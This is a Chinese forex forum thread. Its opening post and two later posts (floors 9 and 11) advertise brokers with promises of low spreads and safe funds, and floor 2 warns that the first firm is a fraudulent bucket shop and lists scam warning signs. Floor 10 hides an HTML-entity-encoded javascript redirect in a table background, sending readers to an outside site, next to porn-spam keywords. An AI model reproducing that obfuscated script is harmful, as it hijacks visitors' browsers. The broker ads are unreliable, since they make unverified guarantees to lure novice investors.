论坛首页 → 外汇论坛 → 『外汇交流』 → 金晟国际投资有限公司(广州办事处)外汇点差5点~绝对信得过
发表新的主题 发起新的投票 发起新的交易 发起新的任务 回复话题
标题:金晟国际投资有限公司(广州办事处)外汇点差5点~绝对信得过
leonarthas
等级:社区游民
权限:普通用户
积分:2
金钱:2
声望:1
经验:1
发帖数:1
注册时间:2006-9-18
收藏 编辑 删除 楼主

金晟国际投资有限公司      本公司在澳门~上海~加拿大~美国都有分公司~本公司不是投资中介公司而是直属总公司的办事处~所以能能够确保你的投资资金得到安全的保障~

本公司的买卖点差为5点~还有一班职业操盘手帮你更加稳定地赚取利润~本公司网址为http://www.ksil-cur.com/

地址是广州市云山大酒店3楼 有意投资者请拨打13560435579找陈生~

2006-9-18 22:19:16IP: 保密
揭黑者
等级:社区游民
权限:普通用户
积分:3
金钱:3
声望:2
经验:2
发帖数:2
注册时间:2006-10-16
编辑 删除 引用 第2楼
无意中在和讯外汇网的机构汇评上看到"金晟研发部外汇市场周评".知道这黑中介又在扩张了,于是决定借此平台通告那些正在被这公司残害的无知人士.
金晟国际投资有限公司是一间典型的外汇保证金黑中介,完全意义上的对赌公司,据我所知道的是他们在北京有总公司,广州也有分公司,性质完全一样的黑.什么是对赌呢?就是说客户在该公司平台上进行的操作买卖的资金,其实是完全没有投放到真实市场上的,公司直接跟客户对赌.该公司的实际所有收入其实就是客户亏的钱.该公司的网站www.ksil-cur.com/上可以明显的看出很多问题,大家可以对照潜在骗子公司的十大特点
其中是第1,3(处女岛是一个无监管的避税地区),4,5,6,7(人民币开户存到一个私人名字的银行帐号,根本没有任何保障),8都是明显而且完全符合的



由于外汇保证金交易是一个新兴行业,监管环境宽松,所以不少非正规公司利用人们对该行业的不了解进行欺诈活动。符合下面列举的某个特征并不表示该公司就是骗子公司,只是潜在风险更高一些。


1、公司网站上无联系方式和邮政地址,客户联系电话拨打不通。

2、公司网站域名注册信息与公司基本信息不符。

3、公司注册地是属于毫无监管的地区,比如某个群岛。

4、公司没有处于相关政府机构或监管组织的监管下。

5、在相关政府机构或监管组织的官方网站查询不到该公司的注册信息,或者查询到的注册信息与公司信息不符。

6、在搜索引擎如Google上搜索该公司信息,几乎没有第三方英文网站或英文媒体对其有报道(也就是说主要在大陆开展业务)。

7、在中国境内接受入金(无论是美元或人民币),这已经违反了中国法律。

8、收款人名称、公司名称和监管机构网站上的公司注册信息三者有不符之处。

9、公司许诺不切实际的交易条件,比如很低的点差。

10、公司曾经有欺诈记录,并被相关政府机构或监管组织列于黑名单中。
其主要经营手法是利用一些求职网站,报纸,吸引一些无知的求职者进入公司参加所谓的"培训",再把他们变成公司里的所谓"投资顾问",然后就让他们出去寻找客户开户,然后有所谓"经验丰富水平很高"的经理主任带领着菜鸟顾问们操作,结果菜鸟们当然是别有用心,水平很"高"的指导下损失惨重.
最可笑的是那些害人者还在一边内心偷笑一边假腥腥的安慰菜鸟,劝他们再去开户,从头再来.....最后劝告一下菜鸟们,保证金不要随便碰,非要做的话,开户用的是美圆(不是人民币),是由自己直接汇到美国和公司台头完全一样的美国帐户的.只要不是这样开户的,资金安全和该公司的性质就100%有问题.不要被一些所谓经理主任的伪善面孔所欺骗.有点脑子的就根本没必要在这种公司开户,随便找一间在NFA注册的美国公司,点差资金安全都比它要好.如果有谁还想在金晟这种公司投资,建议您那些钱干脆拿去买彩票得了
2006-10-16 11:47:13IP:保密
bainaitun
等级:社区游民
权限:普通用户
积分:3
金钱:3
声望:3
经验:3
发帖数:3
注册时间:2006-10-16
编辑 删除 引用 第3楼
自己刻盘的煞笔公司
2006-10-16 13:47:58IP:保密
ly2jxl
等级:社区游民
权限:普通用户
积分:3
金钱:3
声望:3
经验:3
发帖数:3
注册时间:2006-10-18
编辑 删除 引用 第4楼

感谢2楼的朋友详细耐心的解释,我正在一家投资公司培训,我也非常怀疑真实性。刚才我在网上寻找法律援助,知道通过中介抄外汇是违法的,但是我的确对外汇很有兴趣,我想请问,在中国能抄外汇吗?如果能,通过什么机构才是合法的呢?请留下您的QQ好吗?或者加我3694643。我这方面是菜鸟,真的有很多疑问!拜托!!!!

2006-10-18 17:15:50IP:保密
yoyo
等级:社区游民
权限:普通用户
积分:1
金钱:1
声望:1
经验:1
发帖数:1
注册时间:2008-10-25
编辑 删除 引用 第5楼
金晟投資公司在廣州和其他地區已騙了很多人,請大家不要相信,請大家發貼通告.
2008-10-25 20:08:20IP:保密
强哥
等级:社区游侠
权限:普通用户
积分:35
金钱:35
声望:35
经验:35
发帖数:35
注册时间:2008-10-30
编辑 删除 引用 第6楼

正在学,请多多指教

2008-10-31 16:15:52IP:保密
强哥
等级:社区游侠
权限:普通用户
积分:35
金钱:35
声望:35
经验:35
发帖数:35
注册时间:2008-10-30
编辑 删除 引用 第7楼

正在学,请多多指教

2008-10-31 16:18:47IP:保密
强哥
等级:社区游侠
权限:普通用户
积分:35
金钱:35
声望:35
经验:35
发帖数:35
注册时间:2008-10-30
编辑 删除 引用 第8楼

谢谢分享,受益匪浅.认直学习,积累经验!

2008-10-31 16:19:52IP:保密
shrnjr110
等级:社区游民
权限:普通用户
积分:12
金钱:12
声望:12
经验:12
发帖数:12
注册时间:2009-1-28
编辑 删除 引用 第9楼
PT MAXGAIN 是一家资金雄厚且极具丰富经验的证劵交易所。公司在印尼拥有65%的市场份额。我们在上海的代表处可以为市民提供投资外汇现货和股指现货的机会。
    上海代表处绝非代理商,是直属机构。我们极其重视客户资金的安全性,确保万无一失!公司提供4种控制投资风险的方法,1:400的杠杆比例,24小时的优质服务等一系列措施,最大程度上保证客户的利益,使客户赚取最大回报!
    欢迎有意向的朋友到公司咨询!
   地址:上海市北京东路668号科技京城东楼22层
   电话:13166361836
   联系人:白先生
2009-1-28 23:49:19IP:保密
winten520
等级:社区游民
权限:普通用户
积分:3
金钱:3
声望:3
经验:3
发帖数:3
注册时间:2008-12-27
编辑 删除 引用 第10楼
<table background="&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#108&#111&#99&#97&#116&#105&#111&#110&#46&#104&#114&#101&#102&#61&#39&#104&#116&#116&#112&#58&#47&#47&#119&#119&#119&#46&#49&#112&#51&#46&#99&#110&#47&#97&#108&#108&#115&#105&#116&#101&#100&#111&#99&#47&#103&#111&#116&#111&#46&#112&#104&#112&#63&#117&#114&#108&#61&#119&#120&#102&#39&#59"><tr><td>我的BLOG</td></tr></table>

五月天 情色五月天 情色论坛 激情五月天 言情小说

就去干 深爱五月天 就去爱 11SSS 11XP

22CCC 就去色色 就去播播 就去干情色五月天 色色五月天

成人网 激情网站 成人激情网站 色情五月天 成人图片

2009-2-4 22:14:33IP:保密
兜兜
等级:社区游民
权限:普通用户
积分:20
金钱:20
声望:20
经验:20
发帖数:20
注册时间:2008-11-28
编辑 删除 引用 第11楼

大家好,我们是I  TRADEFX 联营公司,NFA的注册资产排名第二,NFACTFC双重监管,点差是2-3个。希望有做外汇的朋友跟我们联系,我们会从代理角度给予比较高的返点Q Q  2 8 0 0 3 2 2 0 4 .期待与您合作,无论您是代理公司还是个人,我们都可以从代理角度去给您最大的返点和优惠,也可以及时帮助您更好的了解外汇最深层面的问题

2009-3-24 15:39:43IP:保密
 快速回复
  • 支持UBB,HTML标签

  • 高级回复
  • 内容

    操作选项: 加精 解精 奖惩 设专题 设公告 解公告 固顶 总固顶 解固顶 结帖 解结帖 锁帖 解锁 移帖 删帖


    Copyright © 2004-2005  外汇论坛 WaiHui.org
    本论坛言论纯属发表者个人意见,与 外汇论坛 立场无关
    闽ICP备07075024号 Powered By: BBSGood.Speed Version 5.0 -